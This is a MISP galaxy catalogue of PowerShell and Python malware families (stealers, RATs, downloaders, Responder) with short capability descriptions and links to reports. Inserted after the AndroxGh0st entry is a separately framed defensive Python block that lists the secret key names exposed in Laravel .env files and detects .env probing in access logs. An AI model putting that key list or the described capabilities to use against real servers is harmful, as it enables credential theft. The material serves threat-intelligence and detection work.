- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://unit42.paloaltonetworks.com/thanos-ransomware/ - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-055a - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
POWRUNER
Internal MISP references
UUID 63f6df51-4de3-495a-864f-0a7e30c3b419
which can be used as unique global reference for POWRUNER
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner - webarchive
- https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2 - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PresFox
The family adds a fake root certificate authority, sets a proxy.pac URL for local browsers, and redirects infected users to fake banking applications (currently targeting Poland). Based on the information shared, the PowerShell script appears to be dropped by an exploit kit.
Internal MISP references
UUID c8c5ca3c-7cf0-453e-9fe9-d5637b1ab1f8
which can be used as unique global reference for PresFox
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QUADAGENT
Internal MISP references
UUID e27bfd65-4a58-416a-b03a-1ab1703edb24
which can be used as unique global reference for QUADAGENT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent - webarchive
- https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
- https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/ - webarchive
- https://www.fireeye.com/blog/threat-research/2020/07/scandalous-external-detection-using-network-scan-data-and-automation.html - webarchive
- https://youtu.be/pBDu8EGWRC4?t=2492 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RandomQuery (Powershell)
A set of PowerShell scripts, using services like Google Docs and Dropbox as C2.
Internal MISP references
UUID b0a67107-dff2-4fb9-a47e-10f83779bdbb
which can be used as unique global reference for RandomQuery (Powershell)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RMOT
According to Trellix, this is a first-stage, PowerShell-based malware dropped via Excel/VBS. It is able to establish a foothold and exfiltrate data. Targets identified include hotels in Macao.
Internal MISP references
UUID 7e79444b-95d9-422d-92f0-aeb833a7cbcd
which can be used as unique global reference for RMOT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RogueRobin
Internal MISP references
UUID 1e27a569-1899-4f6f-8c42-aa91bf0a539d
which can be used as unique global reference for RogueRobin
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin - webarchive
- https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/ - webarchive
- https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca - webarchive
- https://ironnet.com/blog/dns-tunneling-series-part-3-the-siren-song-of-roguerobin/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Royal Ransom (Powershell)
Toolkit downloader used by Royal Ransomware group, involving GnuPG for decryption.
Internal MISP references
UUID 1c75ffff-59f9-4fdc-958d-51f822f76c35
which can be used as unique global reference for Royal Ransom (Powershell)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Schtasks
Internal MISP references
UUID 3c627182-e4ee-4db0-9263-9d657a5d7c98
which can be used as unique global reference for Schtasks
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
skyrat
Internal MISP references
UUID 8e5d7d24-9cdd-4376-a6c7-967273dfeeab
which can be used as unique global reference for skyrat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
sLoad
sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular sLoad.
Known Synonyms |
---|
Starslord |
Internal MISP references
UUID e78c0259-9299-4e55-b934-17c6a3ac4bc2
which can be used as unique global reference for sLoad
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload - webarchive
- https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9 - webarchive
- https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html - webarchive
- https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/ - webarchive
- https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/ - webarchive
- https://blog.minerva-labs.com/sload-targeting-europe-again - webarchive
- https://threatpost.com/sload-spying-payload-delivery-bits/151120/ - webarchive
- https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy - webarchive
- https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/ - webarchive
- https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/ - webarchive
- https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/ - webarchive
- https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan - webarchive
- https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Snugy
Internal MISP references
UUID 773a6520-d164-4727-8351-c4201b04f10b
which can be used as unique global reference for Snugy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
STEELHOOK
Internal MISP references
UUID f963e3df-13d1-4fd0-abdd-792c0d05e41c
which can be used as unique global reference for STEELHOOK
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SUBTLE-PAWS
Internal MISP references
UUID 399258d3-6919-45f9-a557-10c3cbef9bd4
which can be used as unique global reference for SUBTLE-PAWS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Swrort Stager
Internal MISP references
UUID 3347a1bc-6b4d-459c-98a5-746bab12d011
which can be used as unique global reference for Swrort Stager
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Tater PrivEsc
Internal MISP references
UUID 808445e6-f51c-4b5d-a812-78102bf60d24
which can be used as unique global reference for Tater PrivEsc
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ThunderShell
Internal MISP references
UUID fd9904a6-6e06-4b50-8bfd-64ffb793d4a4
which can be used as unique global reference for ThunderShell
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified PS 001
Recon and exfiltration script, dropped from a LNK file. Attributed to APT-C-12.
Internal MISP references
UUID 77231587-0dbe-4064-97b5-d7f4a2e3dc67
which can be used as unique global reference for Unidentified PS 001
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified PS 002 (RAT)
A Powershell-based RAT capable of pulling further payloads, delivered through Russia-themed phishing mails.
Internal MISP references
UUID 73578ff6-b218-4271-9bda-2a567ba3e259
which can be used as unique global reference for Unidentified PS 002 (RAT)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_002 - webarchive
- https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified PS 003 (RAT)
This malware is a RAT written in PowerShell. It has the following capabilities: downloading and uploading files, loading and executing a PowerShell script, and executing a specific command. It was observed by the Malwarebytes Labs Threat Intelligence Team in a newly discovered campaign that tries to lure Germans with a promise of updates on the current threat situation in Ukraine, according to Malwarebytes Labs.
Internal MISP references
UUID 709ba4ad-9ec5-4e0b-b642-96db3b7f6898
which can be used as unique global reference for Unidentified PS 003 (RAT)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified PS 004 (RAT)
Internal MISP references
UUID a8f69576-676f-4536-b301-246ddd87ceeb
which can be used as unique global reference for Unidentified PS 004 (RAT)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ViperSoftX
Internal MISP references
UUID 15b551ea-b59a-40f9-a10f-6144415d2d5c
which can be used as unique global reference for ViperSoftX
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.vipersoftx - webarchive
- https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/ - webarchive
- https://chris.partridge.tech/2022/evolution-of-vipersoftx-dga - webarchive
- https://www.trendmicro.com/en_us/research/23/d/vipersoftx-updates-encryption-steals-data.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WannaMine
Internal MISP references
UUID beb4f2b3-85d1-491d-8ae1-f7933f00f820
which can be used as unique global reference for WannaMine
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannamine - webarchive
- https://www.cybereason.com/blog/wannamine-cryptominer-eternalblue-wannacry - webarchive
- https://nakedsecurity.sophos.com/2018/01/31/what-are-wannamine-attacks-and-how-do-i-avoid-them/ - webarchive
- https://www.accenture.com/_acnmedia/PDF-46/Accenture-Threat-Analysis-Monero-Wannamine.pdf - webarchive
- https://www.crowdstrike.com/blog/cryptomining-harmless-nuisance-disruptive-threat/ - webarchive
- https://news.sophos.com/fr-fr/2020/01/22/wannamine-meme-cybercriminels-veulent-avoir-mot-a-dire-sur-brexit/ - webarchive
- https://www.crowdstrike.com/blog/weeding-out-wannamine-v4-0-analyzing-and-remediating-this-mineware-nightmare/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WannaRen Downloader
Internal MISP references
UUID c9ef106e-def9-4229-8373-616a298ed645
which can be used as unique global reference for WannaRen Downloader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WMImplant
Internal MISP references
UUID d1150a1a-a2f4-4954-b22a-a85b7876408e
which can be used as unique global reference for WMImplant
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AndroxGh0st
According to Lacework, this is an SMTP cracker whose primary purpose is to scan for and parse Laravel application secrets from exposed .env files. Note: Laravel is an open source PHP framework, and its .env file is often targeted for the configuration data it holds, including AWS, SendGrid and Twilio credentials. AndroxGh0st has multiple features to enable SMTP abuse, including scanning, exploitation of exposed credentials and APIs, and even deployment of webshells. For AWS specifically, the malware scans for and parses AWS keys but also has the ability to generate keys for brute-force attacks. However, the brute-force capability is likely a novelty and a statistically unlikely attack vector.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AndroxGh0st.
Known Synonyms |
---|
Androx |
AndroxGhost |
Internal MISP references
UUID e8f24c9c-c03c-4740-a121-d73789931c8e
which can be used as unique global reference for AndroxGh0st
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
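The scan-and-parse behaviour described above, as an added example that is neither part of the Malpedia entry nor code from the malware: a parser for Laravel-style .env files that reports which high-value keys an exposed file would leak, and a detector that runs over web-server access logs for the `.env` probing that precedes the theft. The key names are the usual Laravel/vendor ones and are an assumption of this example; the .env contents and log lines are constructed for it.

```python
import re
from typing import Optional

# Key names AndroxGh0st is reported to harvest (AWS, mail/SendGrid, Twilio). The exact
# names are the common Laravel/vendor ones and are an assumption of this example.
SENSITIVE_KEY_PATTERNS = [
    r"^AWS_(ACCESS_KEY_ID|SECRET_ACCESS_KEY|SESSION_TOKEN)$",
    r"^MAIL_(HOST|USERNAME|PASSWORD)$",
    r"^SENDGRID_API_KEY$",
    r"^TWILIO_(ACCOUNT_SID|AUTH_TOKEN|SID|TOKEN)$",
    r"^APP_KEY$",
]


def parse_dotenv(text: str) -> dict:
    """Parse KEY=VALUE lines the way a scraper would: skip comments and blanks, strip matching quotes."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        env[key.strip()] = value
    return env


def exposed_secrets(env: dict) -> list:
    """Keys an attacker parsing this .env would take first (only those with a non-empty value)."""
    return sorted(k for k in env if env[k] and any(re.match(p, k) for p in SENSITIVE_KEY_PATTERNS))


# Apache/nginx combined log format: host ident user [time] "method target proto" status bytes ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# /.env itself and the usual backup/copy variants, at any depth in the path
ENV_PROBE = re.compile(r"(^|/)\.env(\.[\w.-]+)?$")


def classify_request(line: str) -> Optional[dict]:
    """Return a finding for a request that targets a .env file, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, when, method, target, status = m.groups()
    path = target.split("?", 1)[0]
    if not ENV_PROBE.search(path):
        return None
    # status 200 means the file was actually served: treat the secrets in it as burned
    return {"src": src, "time": when, "method": method, "path": path,
            "status": int(status), "served": status == "200"}


def scan_access_log(log_text: str) -> list:
    return [f for f in (classify_request(l) for l in log_text.splitlines()) if f]


# Constructed sample .env (no real keys) and constructed log lines for the demo.
SAMPLE_ENV = """# constructed sample, not from a real deployment
APP_NAME=Laravel
APP_KEY=base64:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
MAIL_HOST=smtp.sendgrid.net
MAIL_USERNAME=apikey
MAIL_PASSWORD="SG.example-not-a-real-key"
AWS_ACCESS_KEY_ID=AKIAEXAMPLEEXAMPLE00
AWS_SECRET_ACCESS_KEY='example/not+real'
TWILIO_AUTH_TOKEN=
"""

SAMPLE_LOG = """203.0.113.7 - - [10/Jan/2024:12:00:01 +0000] "GET /.env HTTP/1.1" 404 196 "-" "python-requests/2.31"
203.0.113.7 - - [10/Jan/2024:12:00:02 +0000] "GET /laravel/.env HTTP/1.1" 200 812 "-" "python-requests/2.31"
198.51.100.4 - - [10/Jan/2024:12:00:03 +0000] "GET /index.php?page=env HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:12:00:04 +0000] "GET /.env.bak HTTP/1.1" 404 196 "-" "python-requests/2.31"
"""

if __name__ == "__main__":
    print("keys at risk:", exposed_secrets(parse_dotenv(SAMPLE_ENV)))
    for f in scan_access_log(SAMPLE_LOG):
        print(f)
```

A 404 on `/.env` is still worth an alert: the same source usually walks a list of paths, and the one that returns 200 is the one that matters. The parser deliberately returns key names, not values, so the triage output itself does not become a second copy of the secrets.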
Archivist
Internal MISP references
UUID 2095a09c-3fdd-4164-b82e-2e9a41affd8e
which can be used as unique global reference for Archivist
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ares (Python)
Ares is a Python RAT.
Internal MISP references
UUID c4a578de-bebe-49bf-8af1-407857acca95
which can be used as unique global reference for Ares (Python)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlankGrabber
Stealer written in Python 3, typically distributed bundled via PyInstaller.
Internal MISP references
UUID c41d4749-b713-4f4c-b718-4076c0479ebc
which can be used as unique global reference for BlankGrabber
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BrickerBot
Internal MISP references
UUID f0ff8751-c182-4e9c-a275-81bb03e0cdf5
which can be used as unique global reference for BrickerBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot - webarchive
- https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/ - webarchive
- https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A - webarchive
- http://seclists.org/fulldisclosure/2017/Mar/7 - webarchive
- https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/ - webarchive
- https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/ - webarchive
- http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Creal Stealer
Stealer written in Python.
Internal MISP references
UUID 8a7becae-fc06-4ff1-b364-b26dd3d2edd9
which can be used as unique global reference for Creal Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DropboxC2C
Internal MISP references
UUID 53dd4a8b-374e-48b6-a7c8-58af0e31f435
which can be used as unique global reference for DropboxC2C
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Empyrean
Discord stealer written in Python with JavaScript-based inject files.
Internal MISP references
UUID b1aa0be3-b725-4135-b0b9-3a895d4ef047
which can be used as unique global reference for Empyrean
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Evil Ant
Ransomware written in Python.
Internal MISP references
UUID 24d570c6-3ed4-4346-a8b1-9fed2ed67a95
which can be used as unique global reference for Evil Ant
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Guard
According to Kaspersky Labs, Guard is a malware developed by threat actor WildPressure. It is written in Python and packaged using PyInstaller, both for Windows and macOS operating systems. Its intrinsics resemble parts of how win.milum operates.
Internal MISP references
UUID ac3382b3-3c18-4b16-8f1b-b371794916ac
which can be used as unique global reference for Guard
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
InvisibleFerret
Internal MISP references
UUID 332478a1-146f-406e-9af0-b329e478efff
which can be used as unique global reference for InvisibleFerret
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.invisibleferret - webarchive
- https://security.macnica.co.jp/blog/2024/10/-contagious-interview.html - webarchive
- https://stacklok.com/blog/dependency-hijacking-dissecting-north-koreas-new-wave-of-defi-themed-open-source-attacks-targeting-developers - webarchive
- https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/ - webarchive
- https://www.zscaler.com/blogs/security-research/pyongyang-your-payroll-rise-north-korean-remote-workers-west - webarchive
- https://securitylabs.datadoghq.com/articles/tenacious-pungsan-dprk-threat-actor-contagious-interview/ - webarchive
- https://securityscorecard.com/blog/the-job-offer-that-wasnt-how-we-stopped-an-espionage-plot - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KeyPlexer
Internal MISP references
UUID cadf8c9d-7bb0-40ad-8c8c-043b1d4b2e93
which can be used as unique global reference for KeyPlexer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LaZagne
The author describes LaZagne as an open source project used to retrieve lots of passwords stored on a local computer. It has been developed for the purpose of finding these passwords for the most commonly used software. It is written in Python and provided as compiled standalone binaries for Linux, Mac and Windows.
Internal MISP references
UUID c752f295-7f08-4cb0-92d5-a0c562abd08c
which can be used as unique global reference for LaZagne
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.lazagne - webarchive
- https://www.mandiant.com/resources/blog/alphv-ransomware-backup - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/?utm_source=rss&utm_medium=rss&utm_campaign=apt-group-targeting-governmental-agencies-in-east-asia - webarchive
- https://www.infinitumit.com.tr/apt-35/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf - webarchive
- https://attack.mitre.org/groups/G0100/ - webarchive
- https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/ - webarchive
- https://attack.mitre.org/groups/G0100 - webarchive
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ - webarchive
- https://fourcore.io/blogs/threat-hunting-browser-credential-stealing - webarchive
- https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/ - webarchive
- https://github.com/AlessandroZ/LaZagne - webarchive
- https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lofy
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lofy.
Known Synonyms |
---|
LofyLife |
Internal MISP references
UUID 10882613-ac61-42da-82c8-c0f4bb2673f8
which can be used as unique global reference for Lofy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Loki RAT
This RAT, written in Python, is an open-source fork of the Ares RAT. It integrates additional modules such as recording, lockscreen and locate. A customized version was used by the El Machete APT in a campaign ongoing since 2020. The original code can be found at: https://github.com/TheGeekHT/Loki.Rat/
Internal MISP references
UUID 5e7bb9d4-6633-49f8-8770-9ac1163e6531
which can be used as unique global reference for Loki RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MASEPIE
Internal MISP references
UUID 9233f6e6-9dd7-4b30-adaa-5baf5359d22a
which can be used as unique global reference for MASEPIE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.masepie - webarchive
- https://thehackernews.com/2024/03/apt28-hacker-group-targeting-europe.html?m=1 - webarchive
- https://harfanglab.io/en/insidethelab/compromised-routers-infrastructure-target-europe-caucasus/ - webarchive
- https://cert.gov.ua/article/6276894 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
N3Cr0m0rPh
An IRC bot written in (obfuscated) Python. Distributed in the FreakOut attack campaign; written by the author Freak/Fl0urite, with development potentially dating back as far as 2015.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular N3Cr0m0rPh.
Known Synonyms |
---|
FreakOut |
Necro |
Internal MISP references
UUID 2351539a-165a-4886-b5fe-f56fdf6b167a
which can be used as unique global reference for N3Cr0m0rPh
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph - webarchive
- https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/ - webarchive
- https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr - webarchive
- https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/ - webarchive
- https://www.bleepingcomputer.com/news/security/freakout-malware-worms-its-way-into-vulnerable-vmware-servers/ - webarchive
- https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html - webarchive
- https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/ - webarchive
- https://www.lacework.com/keksec-tsunami-ryuk/ - webarchive
- https://blog.netlab.360.com/necro/ - webarchive
- https://github.com/lacework/lacework-labs/tree/master/keksec - webarchive
- https://twitter.com/xuy1202/status/1393384128456794116 - webarchive
- https://www.lacework.com/blog/the-kek-security-network/ - webarchive
- https://www.lacework.com/blog/spytech-necro-keksecs-latest-python-malware/ - webarchive
- https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/ - webarchive
- https://www.lacework.com/the-kek-security-network/ - webarchive
- https://twitter.com/xuy1202/status/1392089568384454657 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NetWorm
Internal MISP references
UUID 6c6acd00-cdc2-460d-8edf-003b84875b5d
which can be used as unique global reference for NetWorm
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PIRAT
Internal MISP references
UUID bca94d33-e5a1-4bcc-981e-f35fd74a79d1
which can be used as unique global reference for PIRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Poet RAT
Cisco Talos has discovered a Python-based RAT they call Poet RAT. It is dropped from a Word document and delivered together with a Python interpreter and the required libraries. The name originates from references to Shakespeare. Exfiltration happens through FTP.
Internal MISP references
UUID b07819a9-a2f7-454d-a520-c6424cbf1ed4
which can be used as unique global reference for Poet RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.poet_rat - webarchive
- https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf - webarchive
- https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-stibnite/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/ - webarchive
- https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/ - webarchive
- https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/ - webarchive
- https://blog.talosintelligence.com/2020/10/poetrat-update.html - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
poweRAT
Internal MISP references
UUID b5cb3d2b-0205-4883-aaff-0d0b7a7f032d
which can be used as unique global reference for poweRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
pupy (Python)
Internal MISP references
UUID afcc9bfc-1227-4bb0-a88a-5accdbfd58fa
which can be used as unique global reference for pupy (Python)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-trinity - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-gypsy - webarchive
- https://github.com/n1nj4sec/pupy - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PyAesLoader
Internal MISP references
UUID b9ba4f66-78dc-491f-8fd4-0143816ce80e
which can be used as unique global reference for PyAesLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PyArk
Internal MISP references
UUID 01f15f4e-dd40-4246-9b99-c0d81306e37f
which can be used as unique global reference for PyArk
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
pyback
Internal MISP references
UUID 6d96cd1e-98f4-4784-9982-397c5df19bd9
which can be used as unique global reference for pyback
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PY#RATION
According to Securonix, this malware exhibits remote access trojan (RAT) behavior, allowing for control of and persistence on the affected host. As with other RATs, PY#RATION possesses a whole host of features and capabilities, including data exfiltration and keylogging. What makes this malware unusual is its use of WebSockets for both command and control (C2) communication and exfiltration, as well as how it evades detection by antivirus and network security measures.
Internal MISP references
UUID 1dc471d3-6303-48a1-a17a-b4f29e5ba6a9
which can be used as unique global reference for PY#RATION
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PyVil
PyVil RAT
Internal MISP references
UUID 2cf75f3c-116f-4faf-bd32-ba3a5e2327cf
which can be used as unique global reference for PyVil
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
QUIETBOARD
Internal MISP references
UUID 6ebeed34-4a7d-44d8-ae44-83ae37cf5f2f
which can be used as unique global reference for QUIETBOARD
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Responder
Responder is an LLMNR, NBT-NS and mDNS poisoner with a built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Responder.
Known Synonyms |
---|
SpiderLabs Responder |
Internal MISP references
UUID 3271b5ca-c044-4ab8-bbfc-0d6e1a6601fc
which can be used as unique global reference for Responder
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
